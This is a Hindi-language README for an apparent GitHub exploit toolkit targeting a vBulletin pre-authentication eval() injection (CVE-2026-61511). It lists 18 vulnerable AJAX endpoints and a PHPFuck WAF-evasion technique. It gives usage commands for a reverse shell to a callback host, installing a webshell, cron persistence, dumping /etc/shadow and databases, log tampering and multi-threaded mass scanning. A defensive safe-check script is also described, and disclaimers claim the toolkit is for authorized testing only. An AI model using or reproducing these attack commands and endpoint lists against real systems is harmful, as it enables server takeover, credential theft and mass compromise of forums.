
CVE-2026-61511 – vBulletin प्री-ऑथ RCE (CVSS 9.8)। Vuln 5.x/6.x (अनपैच्ड)। एंडपॉइंट पूल, AJAX, PHPFuck WAF बाईपास के माध्यम से मल्टी-एक्सप्लॉइट। पूर्ण टूलकिट: रिवर्स शेल, प्रॉक्सी, पर्सिस्टेंस, वेबशेल, डेटाबेस ऑपरेशन, फ़ायरवॉल नियंत्रण, लॉग प्रबंधन, मास स्कैनिंग। 2 संस्करण: मल्टी-एक्सप्लॉइट और सेफ-चेक। Python 3.8+ नैतिक रूप से उपयोग करें, कानूनी रहें। 🔒

⚠️ केवल नैतिक उपयोग – अधिकृत सुरक्षा परीक्षण
यह रिपॉजिटरी केवल अधिकृत सुरक्षा पेशेवरों, ब्लू टीमों और पेनिट्रेशन टेस्टर्स के लिए उपकरण प्रदान करती है।
कंप्यूटर सिस्टम तक अनधिकृत पहुंच CFAA (अमेरिका), कंप्यूटर मिसयूज़ एक्ट (यूके), TCK 243/244 (तुर्की) और दुनिया भर के समान कानूनों के तहत अवैध है।
CVE‑2026‑61511 vBulletin के AJAX टेम्पलेट रेंडरिंग इंजन में एक PHP eval() इंजेक्शन दोष है।
प्रभावित संस्करण: 5.0.0 – 5.7.5 और 6.0.0 – 6.2.1।
कई अटैक एंडपॉइंट – यह बग कई AJAX हैंडलर्स में मौजूद है:
/ajax/render/pagenav/ajax/api/ad/replaceAdTemplate/ajax/render/widget_php/ajax/render/widget_tabbedcontainer_tab_panel/ajax/api/content_* /getIndexableContent एंडपॉइंटPHPFuck एन्कोडिंग – पेलोड को PHP ऑपरेटरों और संख्याओं के अनुक्रम में बदल दिया जाता है जो WAF फिल्टर को बायपास करता है और मनमाना PHP कोड निष्पादन की अनुमति देता है।
कोई प्रमाणीकरण आवश्यक नहीं – एक हमलावर किसी भी कमजोर एंडपॉइंट पर एक क्राफ्टेड POST अनुरोध भेज सकता है और वेब सर्वर के विशेषाधिकारों के साथ सिस्टम कमांड निष्पादित कर सकता है।
प्रभाव – पूर्ण सर्वर समझौता, डेटा चोरी, बैकडोर, लेटरल मूवमेंट और पर्सिस्टेंस। संस्करण अपग्रेड करें!
| उपकरण | उद्देश्य | लक्षित उपयोगकर्ता |
|---|---|---|
exploit.py | रिवर्स शेल, पर्सिस्टेंस, फ़ाइल ऑपरेशन, डेटाबेस डंप, फ़ायरवॉल प्रबंधन, लॉग प्रबंधन, पोर्ट फ़ॉरवर्डिंग, SSH कुंजी तैनाती, नेटवर्क स्कैनिंग और मास स्कैनिंग (मल्टी‑थ्रेडेड) के साथ पूर्ण टूलकिट। |
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt
requirements.txt सामग्री:
request
urllib3
यह सॉफ्टवेयर केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।
| रेड टीम / अधिकृत पेंटेस्टर्स |
safecheck.py | गैर‑आक्रामक वेरिफायर जो बिना किसी दुर्भावनापूर्ण पेलोड निष्पादित किए भेद्यता की जांच करता है। संस्करण का पता लगाता है, सभी एंडपॉइंट का परीक्षण करता है और विस्तृत रिपोर्ट उत्पन्न करता है। | ब्लू टीम / सुरक्षा ऑडिटर |
| फीचर | exploit.py | safecheck.py |
|---|
| भेद्यता का पता लगाना | ✅ | ✅ |
| संस्करण का पता लगाना | ✅ | ✅ |
| मल्टी‑एंडपॉइंट परीक्षण (18 पथ) | ✅ | ✅ |
| कमांड निष्पादन | ✅ | ❌ |
| रिवर्स शेल | ✅ | ❌ |
| फ़ाइल अपलोड/डाउनलोड | ✅ | ❌ |
| पर्सिस्टेंस तंत्र | ✅ | ❌ |
| वेब शेल तैनाती | ✅ | ❌ |
| डेटाबेस ऑपरेशन | ✅ | ❌ |
| सिस्टम जानकारी संग्रह | ✅ | ✅ |
| फ़ायरवॉल प्रबंधन | ✅ | ❌ |
| लॉग प्रबंधन | ✅ | ❌ |
| पोर्ट फ़ॉरवर्डिंग | ✅ | ❌ |
| SSH कुंजी तैनाती | ✅ | ❌ |
| नेटवर्क स्कैनिंग | ✅ | ❌ |
| मास स्कैनिंग (मल्टी‑थ्रेड) | ✅ | ❌ |
| प्रॉक्सी समर्थन | ✅ | ✅ |
| JSON रिपोर्ट आउटपुट | ✅ | ✅ |
| इंटरैक्टिव मेनू | ✅ | ❌ |
| गैर‑आक्रामक (सुरक्षित) मोड | ❌ | ✅ |
| वर्बोज़/डीबग मोड | ✅ | ✅ |
| कस्टम कमांड निष्पादन | ✅ | ❌ |
| मल्टी‑कमांड चेनिंग | ✅ | ❌ |
| रिमोट फ़ाइल पढ़ना | ✅ | ❌ |
| रिमोट फ़ाइल लिखना | ✅ | ❌ |
| सिस्टम उपयोगकर्ता प्रबंधन | ✅ | ❌ |
| फ़ायरवॉल बायपास तकनीक | ✅ | ❌ |
| WAF चोरी (PHPFuck) | ✅ | ✅ |
| परिदृश्य | अनुशंसित उपकरण |
|---|
| ब्लू टीम – जांचना कि आपका vBulletin इंस्टॉलेशन कमजोर है या नहीं | safecheck.py |
| सुरक्षा ऑडिट – गैर‑आक्रामक भेद्यता मूल्यांकन | safecheck.py |
| रेड टीम – पूर्ण एक्सप्लॉइटेशन के साथ अधिकृत पेनिट्रेशन परीक्षण | exploit.py |
| बग बाउंटी – जिम्मेदार प्रकटीकरण परीक्षण | safecheck.py |
| मास स्कैनिंग – कई लक्ष्यों की भेद्यता की जांच | exploit.py (केवल पहचान) |
| घटना प्रतिक्रिया – जांचना कि सिस्टम समझौता हुए हैं या नहीं | safecheck.py |
| पैरामीटर | विवरण |
|---|
-t, --target | लक्ष्य URL (जैसे http://forum.com/vb) |
--proxy | HTTP प्रॉक्सी (जैसे http://127.0.0.1:8080) |
--timeout | सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10) |
--retry | प्रति पथ पुनः प्रयास संख्या (डिफ़ॉल्ट: 3) |
--output | विस्तृत रिपोर्ट को JSON फ़ाइल में सहेजें |
-v, --verbose | वर्बोज़ आउटपुट |
-q, --quiet | शांत मोड (न्यूनतम आउटपुट) |
--lhost | एक्सप्लॉइट के लिए आवश्यक – कॉलबैक के लिए IP |
--lport | कॉलबैक के लिए पोर्ट (डिफ़ॉल्ट: 4444) |
--threads | मास स्कैनिंग के लिए थ्रेड (डिफ़ॉल्ट: 5) |
--exploit | पहचान के बाद एक्सप्लॉइटेशन करें |
--full | पूर्ण हमला (सभी मॉड्यूल) |
--shell | रिवर्स शेल शुरू करें |
--webshell | वेबशेल इंस्टॉल करें (/shell.php) |
--persist | पर्सिस्टेंस इंस्टॉल करें (क्रॉन जॉब) |
--dump | डेटाबेस डंप करें |
--dump-creds | क्रेडेंशियल डंप करें (/etc/passwd, /etc/shadow) |
--interactive | सफल सत्यापन के बाद इंटरैक्टिव मेनू |
| # | परिदृश्य | कमांड |
|---|
| 1 | त्वरित भेद्यता जांच | python safecheck.py -t http://target.com/vb |
| 2 | रिपोर्ट के साथ विस्तृत स्कैन | python safecheck.py -t http://target.com/vb --output report.json -v |
| 3 | रिवर्स शेल | python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell |
| 4 | पूर्ण हमला (सभी मॉड्यूल) | python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full |
| 5 | फ़ाइल से मास स्कैनिंग | python exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json |
| 6 | इंटरैक्टिव मेनू मोड | python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive |
| # | एंडपॉइंट |
|---|
| 1 | /ajax/render/pagenav |
| 2 | /ajax/render/pagenav?template=page |
| 3 | /ajax/api/ad/replaceAdTemplate |
| 4 | /ajax/render/widget_php |
| 5 | /ajax/render/widget_tabbedcontainer_tab_panel |
| 6 | /ajax/api/content_infraction/getIndexableContent |
| 7 | /ajax/api/content_video/getIndexableContent |
| 8 | /ajax/api/content_text/getIndexableContent |
| 9 | /ajax/api/content_report/getIndexableContent |
| 10 | /ajax/api/content_redirect/getIndexableContent |
| 11 | /ajax/api/content_privatemessage/getIndexableContent |
| 12 | /ajax/api/content_poll/getIndexableContent |
| 13 | /ajax/api/content_photo/getIndexableContent |
| 14 | /ajax/api/content_link/getIndexableContent |
| 15 | /ajax/api/content_gallery/getIndexableContent |
| 16 | /ajax/api/content_event/getIndexableContent |
| 17 | /ajax/api/content_channel/getIndexableContent |
| 18 | /ajax/api/content_attach/getIndexableContent |